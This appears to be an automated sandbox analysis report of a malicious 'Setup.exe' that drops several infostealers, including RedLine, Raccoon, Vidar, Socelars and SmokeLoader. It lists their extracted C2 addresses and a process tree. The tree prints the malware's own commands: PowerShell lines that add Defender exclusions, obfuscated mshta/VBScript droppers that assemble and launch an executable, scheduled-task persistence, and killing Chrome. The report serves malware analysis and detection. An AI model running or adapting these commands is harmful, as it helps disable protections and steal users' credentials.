Analysis
-
max time kernel
42s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
16-11-2021 10:37
General
-
Target
Setup.exe
-
Size
312KB
-
MD5
9b85ec9cb71f0e4f684b2a3bb25b2752
-
SHA1
4b6739d0f3fd9af2dccb098ebc9dd1787b378e2b
-
SHA256
f5b3eb889230479909676d757fa8fa735133c28278b1a31e3563ffdd49c3a455
-
SHA512
5257ccae180e3f042047c764396bf435075925861ddb44700e19bf7eefb69decc0f91820a24a3ac38640a83302037d4c9821abed817ec7bb95481fd57eed6866
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.gianninidesign.com/
Extracted
Family
raccoon
Version
1.8.3-hotfix
Botnet
ddf183af4241e3172885cf1b2c4c1fb4ee03d05a
Attributes
-
url4cnc
http://91.219.236.27/capibar
http://5.181.156.92/capibar
http://91.219.236.207/capibar
http://185.225.19.18/capibar
http://91.219.237.227/capibar
https://t.me/capibar
rc4.plain
rc4.plain
Extracted
Family
redline
Botnet
udptest
C2
193.56.146.64:65441
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
redline
Botnet
15.11_BUILD_1
C2
45.9.20.104:6334
Extracted
Family
smokeloader
Version
2020
C2
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
48.5
Botnet
937
C2
https://koyu.space/@tttaj
Attributes
-
profile_id
937
Signatures
-
Arkei
Arkei is an infostealer written in C++.
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Arkei Stealer Payload 1 IoCs
-
Vidar Stealer 3 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 6 IoCs
Detects Themida, an advanced Windows software protection system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
-
NSIS installer 4 IoCs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Kills process with taskkill 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 34 IoCs
-
Suspicious use of WriteProcessMemory 56 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\JTFvJod6txvzhYbKnEiSP8sz.exe"C:\Users\Admin\Pictures\Adobe Films\JTFvJod6txvzhYbKnEiSP8sz.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\Adobe Films\UgA8QeFE9_YK23h_VfJ8ibeL.exe"C:\Users\Admin\Pictures\Adobe Films\UgA8QeFE9_YK23h_VfJ8ibeL.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 17283⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\3UI1JGMrzfkNs2n2gI0tYUP0.exe"C:\Users\Admin\Pictures\Adobe Films\3UI1JGMrzfkNs2n2gI0tYUP0.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\Vsap8pNvPTbVeeVPfkQQfB9N.exe"C:\Users\Admin\Pictures\Adobe Films\Vsap8pNvPTbVeeVPfkQQfB9N.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\lyM4QpfYWNberHZ3z5jpsDMW.exe"C:\Users\Admin\Pictures\Adobe Films\lyM4QpfYWNberHZ3z5jpsDMW.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 6603⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 6763⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 6843⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 6403⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 10163⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 10443⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\bgYLMapV9sU0Jz8kliylwtnd.exe"C:\Users\Admin\Pictures\Adobe Films\bgYLMapV9sU0Jz8kliylwtnd.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\sitXDnXtuUg2NIFeNrSDQGFV.exe"C:\Users\Admin\Documents\sitXDnXtuUg2NIFeNrSDQGFV.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\RlfQ0sUEKzdCrZUI53vmkLk8.exe"C:\Users\Admin\Pictures\Adobe Films\RlfQ0sUEKzdCrZUI53vmkLk8.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\zOx6cN8qAtL9WRN4tBPZF0VC.exe"C:\Users\Admin\Pictures\Adobe Films\zOx6cN8qAtL9WRN4tBPZF0VC.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 6525⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 6645⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 7125⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 7245⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\djh3R4e4NUV1S0pqG2ZUgBw8.exe"C:\Users\Admin\Pictures\Adobe Films\djh3R4e4NUV1S0pqG2ZUgBw8.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Kl0O7VNybbBU6N3CQScr_Dn1.exe"C:\Users\Admin\Pictures\Adobe Films\Kl0O7VNybbBU6N3CQScr_Dn1.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\pCFpQNPgXBIAF_ojNHmvvNUk.exe"C:\Users\Admin\Pictures\Adobe Films\pCFpQNPgXBIAF_ojNHmvvNUk.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\elQlklS5xTaA5RISnatFZEi0.exe"C:\Users\Admin\Pictures\Adobe Films\elQlklS5xTaA5RISnatFZEi0.exe"4⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\FEw1n0E0JzK5T4xOmYa48JGk.exe"C:\Users\Admin\Pictures\Adobe Films\FEw1n0E0JzK5T4xOmYa48JGk.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\FEw1n0E0JzK5T4xOmYa48JGk.exe"C:\Users\Admin\Pictures\Adobe Films\FEw1n0E0JzK5T4xOmYa48JGk.exe" -u5⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\QZ_MmORGRhBH1o4evlyKGdC_.exe"C:\Users\Admin\Pictures\Adobe Films\QZ_MmORGRhBH1o4evlyKGdC_.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1HRMN.tmp\QZ_MmORGRhBH1o4evlyKGdC_.tmp"C:\Users\Admin\AppData\Local\Temp\is-1HRMN.tmp\QZ_MmORGRhBH1o4evlyKGdC_.tmp" /SL5="$1035C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\QZ_MmORGRhBH1o4evlyKGdC_.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4PINP.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-4PINP.tmp\lakazet.exe" /S /UID=27096⤵
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_Ff0Vl84aF9Yd1J1kUJXi2nk.exe"C:\Users\Admin\Pictures\Adobe Films\_Ff0Vl84aF9Yd1J1kUJXi2nk.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\_Ff0Vl84aF9Yd1J1kUJXi2nk.exe"C:\Users\Admin\Pictures\Adobe Films\_Ff0Vl84aF9Yd1J1kUJXi2nk.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\77uwz_7AfaBiPpQMCfoIVFfp.exe"C:\Users\Admin\Pictures\Adobe Films\77uwz_7AfaBiPpQMCfoIVFfp.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"3⤵
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"3⤵
-
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TBoqWKoCGPISQLPs2AUEM8la.exe"C:\Users\Admin\Pictures\Adobe Films\TBoqWKoCGPISQLPs2AUEM8la.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\bunkhouse\svchost.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\bunkhouse\svchost.exe" -Force3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\TBoqWKoCGPISQLPs2AUEM8la.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\TBoqWKoCGPISQLPs2AUEM8la.exe" -Force3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yhL1S4zrSEMiPXayoqmoy0dV.exe"C:\Users\Admin\Pictures\Adobe Films\yhL1S4zrSEMiPXayoqmoy0dV.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\z9APPE7_M34diecHzkI3lNJ3.exe"C:\Users\Admin\Pictures\Adobe Films\z9APPE7_M34diecHzkI3lNJ3.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\z9APPE7_M34diecHzkI3lNJ3.exe"C:\Users\Admin\Pictures\Adobe Films\z9APPE7_M34diecHzkI3lNJ3.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TsrAARd8fNIieBS8ClUPrubV.exe"C:\Users\Admin\Pictures\Adobe Films\TsrAARd8fNIieBS8ClUPrubV.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\bU0MzMvl6LHutIlGECskbFWf.exe"C:\Users\Admin\Pictures\Adobe Films\bU0MzMvl6LHutIlGECskbFWf.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\qqoKK3TqLg3JBBx3zFEyailY.exe"C:\Users\Admin\Pictures\Adobe Films\qqoKK3TqLg3JBBx3zFEyailY.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 9203⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LnO_n4UbeXMzytNsEDsIJrdb.exe"C:\Users\Admin\Pictures\Adobe Films\LnO_n4UbeXMzytNsEDsIJrdb.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Rj6fy998h7uZaug5nHUXzOf7.exe"C:\Users\Admin\Pictures\Adobe Films\Rj6fy998h7uZaug5nHUXzOf7.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\6810146.exe"C:\Users\Admin\AppData\Roaming\6810146.exe"3⤵
-
-
C:\Users\Admin\AppData\Roaming\957453.exe"C:\Users\Admin\AppData\Roaming\957453.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Roaming\6349681.exe"C:\Users\Admin\AppData\Roaming\6349681.exe"3⤵
-
-
C:\Users\Admin\AppData\Roaming\5977566.exe"C:\Users\Admin\AppData\Roaming\5977566.exe"3⤵
-
-
C:\Users\Admin\AppData\Roaming\6419111.exe"C:\Users\Admin\AppData\Roaming\6419111.exe"3⤵
-
-
C:\Users\Admin\AppData\Roaming\8831109.exe"C:\Users\Admin\AppData\Roaming\8831109.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\616927.exe"C:\Users\Admin\AppData\Roaming\616927.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCriPT: cLOse ( CREATeOBjecT ( "wsCRipT.sHeLl" ). RUN ( "CmD.Exe /C cOpY /y ""C:\Users\Admin\AppData\Roaming\616927.exe"" ..\2XWllNGTIWAqr6.Exe && START ..\2XWllNGTIWaqr6.exE -PX7vthTn~HNSZZcPFYIS_BIoryr5Q1& IF """"=="""" for %Q IN ( ""C:\Users\Admin\AppData\Roaming\616927.exe"" ) do taskkill -f -iM ""%~nxQ"" " , 0 , TRUe ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOpY /y "C:\Users\Admin\AppData\Roaming\616927.exe" ..\2XWllNGTIWAqr6.Exe && START ..\2XWllNGTIWaqr6.exE -PX7vthTn~HNSZZcPFYIS_BIoryr5Q1& IF ""=="" for %Q IN ( "C:\Users\Admin\AppData\Roaming\616927.exe" ) do taskkill -f -iM "%~nxQ"6⤵
-
C:\Users\Admin\AppData\Local\Temp\2XWllNGTIWAqr6.Exe..\2XWllNGTIWaqr6.exE -PX7vthTn~HNSZZcPFYIS_BIoryr5Q17⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCriPT: cLOse ( CREATeOBjecT ( "wsCRipT.sHeLl" ). RUN ( "CmD.Exe /C cOpY /y ""C:\Users\Admin\AppData\Local\Temp\2XWllNGTIWAqr6.Exe"" ..\2XWllNGTIWAqr6.Exe && START ..\2XWllNGTIWaqr6.exE -PX7vthTn~HNSZZcPFYIS_BIoryr5Q1& IF ""-PX7vthTn~HNSZZcPFYIS_BIoryr5Q1""=="""" for %Q IN ( ""C:\Users\Admin\AppData\Local\Temp\2XWllNGTIWAqr6.Exe"" ) do taskkill -f -iM ""%~nxQ"" " , 0 , TRUe ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOpY /y "C:\Users\Admin\AppData\Local\Temp\2XWllNGTIWAqr6.Exe" ..\2XWllNGTIWAqr6.Exe && START ..\2XWllNGTIWaqr6.exE -PX7vthTn~HNSZZcPFYIS_BIoryr5Q1& IF "-PX7vthTn~HNSZZcPFYIS_BIoryr5Q1"=="" for %Q IN ( "C:\Users\Admin\AppData\Local\Temp\2XWllNGTIWAqr6.Exe" ) do taskkill -f -iM "%~nxQ"9⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRipT: ClosE ( crEatEOBJeCT ( "WscRiPt.shElL"). RUN ( "CMD /Q /C echo | seT /P = ""MZ"" > OHSPoRD.K & CopY /B /y oHSPoRD.K+KQVI.2G+ BVW~.0 + uGQKDE~.WP8 + 5lIdq.F + XIDzHw8.U1 + ZYGVW.5Nt ..\_PYvYm.r43 & del /q *&stArt msiexec /Y ..\_pyvYM.R43 " , 0 ,True ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C echo | seT /P = "MZ" > OHSPoRD.K& CopY /B /y oHSPoRD.K+KQVI.2G+ BVW~.0 + uGQKDE~.WP8 + 5lIdq.F + XIDzHw8.U1 + ZYGVW.5Nt ..\_PYvYm.r43 & del /q *&stArt msiexec /Y ..\_pyvYM.R439⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>OHSPoRD.K"10⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "10⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "616927.exe"7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\244812.exe"C:\Users\Admin\AppData\Roaming\244812.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Roaming\6546503.exe"C:\Users\Admin\AppData\Roaming\6546503.exe"3⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\apWqJYSmGjk8UxEqOq7fn4FR.exe"C:\Users\Admin\Pictures\Adobe Films\apWqJYSmGjk8UxEqOq7fn4FR.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\cNkUYp1yjpTvh8TnOXngE_HS.exe"C:\Users\Admin\Pictures\Adobe Films\cNkUYp1yjpTvh8TnOXngE_HS.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\cNkUYp1yjpTvh8TnOXngE_HS.exe" & exit3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 54⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\fe7Wczal6V9DTt2tHRy4Y_Iq.exe"C:\Users\Admin\Pictures\Adobe Films\fe7Wczal6V9DTt2tHRy4Y_Iq.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\IBgU1b2L6aQBlCs8D6dK4y3y.exe"C:\Users\Admin\Pictures\Adobe Films\IBgU1b2L6aQBlCs8D6dK4y3y.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\C2mgxm2dWelllqpl7jm1JCvx.exe"C:\Users\Admin\Pictures\Adobe Films\C2mgxm2dWelllqpl7jm1JCvx.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-PFJ61.tmp\C2mgxm2dWelllqpl7jm1JCvx.tmp"C:\Users\Admin\AppData\Local\Temp\is-PFJ61.tmp\C2mgxm2dWelllqpl7jm1JCvx.tmp" /SL5="$301EE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\C2mgxm2dWelllqpl7jm1JCvx.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VMGO4.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-VMGO4.tmp\lakazet.exe" /S /UID=27092⤵
-
C:\Users\Admin\AppData\Local\Temp\95-8a314-1a6-00982-e4c6e048561ed\Divaeqative.exe"C:\Users\Admin\AppData\Local\Temp\95-8a314-1a6-00982-e4c6e048561ed\Divaeqative.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\c4-e0ae1-b6a-024bc-84a6c9e26e5fc\Panoquguqae.exe"C:\Users\Admin\AppData\Local\Temp\c4-e0ae1-b6a-024bc-84a6c9e26e5fc\Panoquguqae.exe"3⤵
-
-
C:\Program Files\Microsoft Office 15\STKETHRFQD\foldershare.exe"C:\Program Files\Microsoft Office 15\STKETHRFQD\foldershare.exe" /VERYSILENT3⤵
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.1MB
-
Filesize
8.6MB
-
Filesize
8.7MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
696KB
-
Filesize
4KB
-
Filesize
184KB
-
Filesize
4KB
-
Filesize
396KB
-
Filesize
228KB
-
Filesize
176KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
96KB
-
Filesize
72KB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
44KB
-
Filesize
48KB
-
Filesize
376KB
-
Filesize
108KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
12KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
39.5MB
-
Filesize
80KB
-
Filesize
272KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
436KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
35.9MB
-
Filesize
852KB
-
Filesize
35.9MB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
12KB
-
Filesize
1.3MB
-
Filesize
88KB
-
Filesize
31.7MB
-
Filesize
36KB
-
Filesize
1.3MB
-
Filesize
380KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
572KB
-
Filesize
1.3MB
-
Filesize
580KB
-
Filesize
696KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
24KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
44KB
-
Filesize
44KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
4KB